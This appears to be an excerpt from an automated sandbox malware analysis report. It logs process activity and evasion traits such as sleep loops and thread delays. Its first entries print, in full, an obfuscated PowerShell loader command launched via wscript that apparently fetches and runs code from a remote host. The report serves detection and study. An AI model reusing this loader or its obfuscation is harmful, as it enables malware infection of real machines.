              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNs
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE7E0000BD pushad ; iretd 4_2_00007FFE7E0000C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_032BC880 pushfd ; ret 7_2_032BC889
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_079785E8 pushad ; ret 7_2_079785E9
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Initial fileInitial file: Do While Skibsprovianteringens.Status = 0 WScript.Sleep 100
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5378Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4534Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6719Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3033Jump to behavior
              Source: C:\Windows\System32\wscript.exe TID: 7512Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8140Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
